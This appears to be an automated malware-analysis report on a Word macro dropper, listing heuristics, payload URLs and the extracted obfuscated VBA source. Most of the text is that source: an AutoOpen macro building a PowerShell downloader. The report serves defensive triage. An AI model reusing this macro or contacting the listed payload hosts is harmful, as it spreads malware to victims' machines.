Verdict: MALICIOUS (Risk Score 292)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1105 Ingress Tool Transfer
The sample contains a VBA macro with an AutoOpen function that executes a Shell command. This macro is designed to decode and download a payload from multiple URLs, as indicated by the OLE_VBA_ENCODED_PS_DROPPER_URL and OLE_VBA_CHR_ARRAY_DROPPER_URL heuristics. The reconstructed URL for the payload download is "http://www.database.z-flooring.com/k70w/". This indicates the file acts as a dropper for further malicious activity.
Heuristics (10)

- ClamAV: Doc.Dropper.Agent-6592396-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-6592396-0
- VBA macros detected [medium, OLE_VBA_MACROS, 5 related findings]: Document contains VBA macro code
- Potential Shell call in VBA [critical, OLE_VBA_SHELL]: Potential Shell call in VBA. Matched line in script:
  YJTiGvzfol = ifkTdiEBrB + Pniiiz + Shell(RTUmJ + swYwf + iRcIGvQkMnr, (5082 / 5082) - 1)
- Payload URL decoded from an encoded PowerShell loader (5 URLs) [high, OLE_VBA_ENCODED_PS_DROPPER_URL]: A VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array, decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
- Payload URL decoded from a Chr() numeric-array loader (2 URLs) [high, OLE_VBA_CHR_ARRAY_DROPPER_URL]: A VBA macro builds its stage-2 download URL from a numeric array (Array(250, 262, …)) decoded one character at a time with Chr() and a linear offset (e.g. Chr(n - 146)), then drives Microsoft.XMLHTTP / ADODB.Stream.SaveToFile / Shell.Application to drop and execute the payload in %TEMP%. The URL is assembled at run time and never appears contiguously on disk, so a literal scan misses it; surfaced as an IOC. Self-validating: only an array that decodes to a valid host URL is reported, so a benign numeric array cannot false-positive.
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro [low, OLE_VBA_AUTOOPEN]: AutoOpen macro. Matched line in script:
  Sub AutoOpen()
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URLs:
  - http://www.database.z-flooring.com/k70w/ (Referenced by macro)
  - http://thectrl24.com/gjOGw/ (Referenced by macro)
  - http://amplajf.com.br/3YrZ/ (Referenced by macro)
  - http://hydrodom.org/WadY9E/ (Referenced by macro)
  - http://www.cycle-film.com/8TfTTH/ (Referenced by macro)
  - http://www.database.z-flooring.com/k70w/@http://thectrl24.com/ (Referenced by macro)
  - http://amplajf.com.br/3YrZ/@http://hydrodom.org/WadY9E/@http://www.cycle-film.com/8TfTTH/ (Referenced by macro)
  - http://schemas.openxmlformats.org/drawingml/2006/main (In document text (OLE body))
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8688 bytes |

SHA-256: 1bf305c451ad53ba3cbaf3e62dab123ce06d443b1df5873271306c6db9912ec8

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 119 of 215 identifiers look randomly generated (e.g. 'QupwABmSsLtIu'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "PDUztJJrVsWOE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "WbjwawIAYnKT"
Function JpdbaC()
On Error Resume Next
hbHka = 82372
CdhrX = wMLhc
hNWDbD = Sin(48669)
fjtiq = 13895
ciWJjv = 21002
wzidTb = CDate(23054)
PVmTubwZr = "Hell ." + Chr(40) + " " + "$s" + "HEllId[1" + "]" + Chr(43) + "$sh" + "EL" + "liD[13"
odAMIs = 20756
Trrfaf = wwMpO
zwqJOD = Sin(22552)
bCwMr = 46572
wNfAWS = 64540
YwDcAh = CDate(31728)
bPkoOJWbU = "]" + Chr(43) + "'x'" + Chr(41) + Chr(40) + Chr(40) + " '12" + "2-26}" + "41P3" + "6P9" + "9P48P5" + "9_41>" + "115}4" + "9H60_52_"
NNOwBl = 8423
hhYtv = CDate(80783)
NNWiLi = MmRzO
EklRPo = 17906
jfLtr = Sin(92711)
hkOzBn = 18642
siWiaOcJiVU = "59P61" + "H42P126-" + "16>5" + "9e42e1" + "12G" + "9>59t6" + "0_" + "29_" + "50_55P" + "59P4" + "8%4" + "2_101H"
jiCfIc = 57272
tPwjQ = CDate(44415)
lwvIfd = jKruJ
mnUGI = 68992
juVih = Sin(50232)
krvOz = 83258
zhscXT = "122" + "e23" + ">13e52G9" + "9t121e54" + "%42_4" + "2P46-10" + "0-11" + "3t113t4"
VXrMi = 68610
doAGwN = CDate(34582)
uhZAsZ = uBjIoc
loNMiA = 86693
ANCBj = 76010
sNTDDl = Sin(25199)
OqmoKh = "1%41e" + "41H112}" + "58_63e" + "42}63t60" + "%63t" + "45" + "-59t11" + "2%" + "36_" + "115"
uKDzPS = 61914
AuUIE = CDate(88666)
nEWMCI = vMQITp
ZpYsjY = 66865
cuwOZp = 77356
EDYVQ = Sin(97309)
npbPEUz = "e56}50>" + "49H" + "49" + "-44P55" + "G48>57" + "}1" + "12G" + "61>49"
wOPiz = 23568
zJFXo = CDate(4723)
FPPtKM = FtNPr
EvUTb = 51431
FwkrUI = 80462
FMXzX = Sin(59911)
wFuQzAL = "_51" + "H1" + "13-53}1" + "05_110-4" + "1G11" + "3e3" + "0>54t42G" + "42" + "P46"
mOwmY = 62809
zzEpN = CDate(77390)
PYthR = rzltzH
sWPrM = 79275
obvpCV = 679
nUozq = Sin(8823)
YORNQHnoaS = "G100%1" + "13-113" + ">42}" + "54%59G6" + "1G42}44H" + "50}" + "108P10" + "6t112" + "t61-49" + ">51" + "H113"
JpdbaC = PVmTubwZr + bPkoOJWbU + siWiaOcJiVU + zhscXT + OqmoKh + npbPEUz + wFuQzAL + YORNQHnoaS
vXLBw = 1892
ipqGK = CDate(21916)
Efzqjt = AbHJk
DiwwH = 5652
JUdqu = 76675
ctTwd = Sin(86134)
End Function
Function OJBjCmhc()
On Error Resume Next
FqzrPz = 98891
NlGLBV = CDate(90558)
YjjrmA = Tvrfso
HKjsM = 40517
wXzjcO = 5421
VWmzw = Sin(41255)
LjIUaon = "e57t" + "52P" + "17" + "%2" + "5}41t113" + "P30P" + "54H42}" + "42>46H10" + "0%113G"
lATTKa = 35483
QJCwbk = CDate(68240)
kBhoS = lAWBiF
VtuplU = 95665
iSzpP = 73488
SJjcV = Sin(72679)
UtZYOzwjL = "113P63" + "e51G4" + "6P50P63P" + "52H56}" + "11" + "2H61>" + "49H" + "51" + "H112e6" + "0H44" + "G113G" + "10"
fiYWJC = 82099
onQnj = CDate(4026)
EvoFw = NVIPT
EswcEj = 16370
TQUul = 45966
CpjjA = Sin(19619)
iwsjuOiNKP = "9_7" + "e44e4t1" + "13" + "H30t5" + "4t42}42" + "_46t1"
oowZc = 82098
WDHhk = CDate(33548)
PKdtcV = RvwKN
Timau = 74682
tjHJfR = 39532
rOAXZj = Sin(28767)
dHnNz = "00e113-" + "11" + "3P54" + "t39" + "}58t44>4" + "9G58t49" + "-51G112" + "t4" + "9H"
jSMCs = 36108
SmuVPw = CDate(15155)
UikiKz = OEQlff
uYlhD = 87013
UrYoW = 51566
EAnUO = Sin(87221)
doIHdYhfrR = "44" + "%57H113" + "e9%63H58" + "-7}103H2" + "7%113e" + "30}54t42" + "%42H4" + "6}100P" + "11" + "3_113-" + "41t41t"
rLnuEj = 52693
AjHICO = CDate(34014)
HThllP = cRjGJ
cRRmJ = 54885
rvEmTZ = 35809
zGzum = Sin(24173)
AMbquZU = "41t112" + "-61G3" + "9}61t50t" + "59e115" + ">56>55e5" + "0P5" + "1}112H6" + "1G49" + "-5" + "1}113" + "P102P10%" + "56_10"
iBZXZG = 7844
zFQjUt = CDate(52329)
zJzjww = njCoHi
jMXrw = 33064
jswvP = 57075
GnMnK = Sin(13413)
QjSkr = "e1" + "0P22-113" + "-121}11" + "2P13G46>" + "50%5" + "5-42" + "H118H1" + "21>" + "30-121}1" + "19}101-1"
bMwrC = 91068
saIljZ = CDate(94255)
ETMCVI = IWpbk
ObTUDq = 29077
OHmuC = 61218
QmMBW = Sin(59865)
OMGEIk = "22}41" + "e12" + "G20%" + "126%99" + "G126}" + "121_111%" + "102"
LSJpUh = 34557
pFVGl = CDate(20986)
qLQJd = QLSNM
kdaOvi = 67327
usIArm = 76363
iCDYc = Sin(38176)
whSzjDldvL = "_107>12" + "1-1" + "01>122-6" + "1%60t28-" + "99}" + "122H59t" + "48t4" + "0}" + "100H42>"
OJBjCmhc = LjIUaon + UtZYOzwjL + iwsjuOiNKP + dHnNz + doIHdYhfrR + AMbquZU + QjSkr + OMGEIk + whSzjDldvL
ZXzhO = 99648
UhMzni = CDate(61538)
FMDvHY = bpvpM
QJoPQH = 71046
STNEJQ = 35348
cPYAln = Sin(93344)
End Function
Function FNzHCira()
On Error Resume Next
hDKzd = 88258
frDBQC = CDate(26169)
sJhmfo = NsYLw
WobpU = 35346
wwUBJ = 47168
Ajuwj = Sin(7671)
YGicNwDr = "59>5" + "1}46}1" + "17P121_2" + "P121G" + "117-122>" + "41}12H" + "20" + "_11" + "7H121}11" + "2e" + "59_38%5"
lUznYr = Sin(23369)
wXnDQG = 26122
Gdwaiu = 97967
QpzTp = CDate(84766)
UYcfG = 77528
XfhrE = pzkIl
XwHIjchHw = "9}" + "12" + "1H1" + "01}56" + "t49H4" + "4_59e63" + "H61G54G"
YqzXNn = Sin(44624)
pvfBE = 7569
KwEOR = 68393
jbjMX = CDate(73515)
tfZHq = 41868
zlHwLz = ibztGN
BNwBZ = "11" + "8>122e3" + "1-6" + "-47" + "}126-55" + "e48-126H" + "12" + "2%23" + "-13_" + "52}119H3" + "7P42_4" + "4_39_37}"
azKrU = Sin(11340)
iFMXbt = 10288
wWsasz = 35011
bzOWEj = CDate(47751)
CajiE = 67752
VtYmnI = cvHvzG
CGKur = "122" + "-26_" + "41P36G1" + "12e26>" + "49" + "-41%48P5" + "0P4" + "9P63" + "G58P24%5" + "5t50%59>" + "11"
mrwpBa = Sin(42153)
adaOw = 17862
jwmOQs = 45502
ZcbufB = CDate(69027)
ZjcDD = 82719
MlOtL = ZPjzW
jrUIcdbK = "8P1" + "22%31>6" + ">47>1" + "14" + "-1" + "26>122"
BjsRTz = Sin(50120)
lpzsP = 81268
iHVCL = 16964
iVBrEO = CDate(54867)
ZhDrUm = 33892
KjZij = AzBin
wdjuZc = "P61}60t2" + "8H119" + "G101H" + "13H4" + "2P" + "63%4" + "4e42" + "t115P" + "14" + ">44-49G6" + "1_59}45H" + "45P1"
rBiuj = Sin(39672)
zATEzJ = 21570
EkKnw = 91449
kHauPR = CDate(64899)
sAOLAR = 23549
jLZfW = nJnoJ
OuizMWh = "26-122" + "t61%" + "60" + "G28-1" + "01G60%44" + ">59}63P5" + "3H10" + "1}3" + "5P61_" + "63" + "}42_6" + "1}5"
FNzHCira = YGicNwDr + XwHIjchHw + BNwBZ + CGKur + jrUIcdbK + wdjuZc + OuizMWh
ouAlw = Sin(2848)
MEfLR = 17559
JtZwN = 99454
RqvHqX = CDate(1474)
DQEJZI = 80647
NEoMAN = ZWLHw
End Function
Function mNRcBKa()
On Error Resume Next
cBjZVR = Sin(29622)
CirWcC = 23343
SfWaLu = 64405
ZnOMIR = CDate(34506)
XDJlj = 89479
fKMIn = JYdvr
YloGzhDdV = "4>37-" + "35t35'-" + "sPL" + "it '}'" + " -SPLIt " + "'p'-s" + "pLIt" + " '-' -sP" + "Li"
CTqjw = Sin(6524)
jVjlM = 58106
RcAPj = 1369
XSzOWj = CDate(14378)
zZiVA = 57361
qCCTAT = jkCcwb
rbKImNV = "T '_'-" + "SpLi" + "T'%' " + "-sP" + "lIt '" + "E'" + "-s"
EPWjp = Sin(12343)
CBJRQ = 5845
LvwYY = 89100
kMVcjq = CDate(99829)
KfVqwh = 93429
FTdaJj = iooSd
KYiJjwSGpzo = "plit" + " '" + ">'" + " -" + "splI" + "t'h'-spl" + "it'" + "g' -sp" + "Li" + "T 't' " + "| FOrEa" + "CH{ [C"
bAmqLU = Sin(85593)
jdvsDK = 76081
TSIcW = 59185
GCUHj = CDate(5391)
ZhRiM = 97955
XSZnmi = JLKGW
anfRJtMEB = "HAr] " + Chr(40) + "$_-BXOr" + " 0" + "x5E " + Chr(41) + "} " + Chr(41) + "-" + "joIn" + "''" + Chr(41) + ""
mNRcBKa = YloGzhDdV + rbKImNV + KYiJjwSGpzo + anfRJtMEB
SjYrUC = Sin(22239)
ZCXuj = 38200
LYQKta = 28047
InUwhZ = CDate(37519)
SZUlv = 14094
oHhYA = Whjbrc
End Function
Attribute VB_Name = "QupwABmSsLtIu"
Function aAqBnrHrZda()
On Error Resume Next
YBGwzz = Sin(55886)
kLpJq = 67488
iiFOnK = CDate(41562)
XGvPBp = 53542
jJkvwq = 66168
SwtiZh = dciiMF
YqwGKPW = cVXjhzhDmL + Chr(GXmjjFRTw + 80 + zwaELPpTCj) + "ow" + "ers"
VCBTN = Sin(11739)
cNHRHL = 15201
JBlBSF = CDate(25353)
kUCMlb = 35166
wcTZY = 9854
Aznvrz = YrwCD
FsjjE = Sin(37401)
wBjPV = 28322
oWErUY = CDate(36065)
PVJpZX = 9266
kHsri = 40074
SMzIP = liGWzw
aAqBnrHrZda = hNSEcKTnJDF + YqwGKPW + JpdbaC + OJBjCmhc + FNzHCira + mNRcBKa
TSjlhi = Sin(29710)
mNuCM = 24756
Phjnl = CDate(27462)
KiuZz = 80939
fVGrTj = 45072
VUXmwD = irZUd
End Function
Function uUrlGP(swYwf)
On Error Resume Next
fzVHXl = Sin(22398)
oPKom = 91365
siLYw = CDate(44278)
YwNVYb = 98439
zuDpS = 85991
MoHWJ = qZzpG
rOZhpt = Sin(9034)
bhincJ = 35079
DRCHZ = CDate(90516)
bXBBJ = 57635
jrhMZG = 79573
RtUTJ = SivKiL
YJTiGvzfol = ifkTdiEBrB + Pniiiz + Shell(RTUmJ + swYwf + iRcIGvQkMnr, (5082 / 5082) - 1)
quWTsp = Sin(54976)
jlwWjX = 36936
SwOrkz = CDate(5806)
VaBsPK = 19591
NSLOH = 19744
ZwwXvq = TRzVo
End Function
Sub AutoOpen()
On Error Resume Next
aiNBM = Sin(73858)
zqILD = 65975
YlGqoS = CDate(67407)
buVXP = 15806
kDkbVp = 66008
rTDWui = fMkbEw
Application.Run "uUrlGP", aAqBnrHrZda
zZbsIh = Sin(28980)
dWZsM = 85560
QMKMz = CDate(7491)
FCVPQZ = 91103
AYwnPD = 86807
KlAbP = hzfWT
End Sub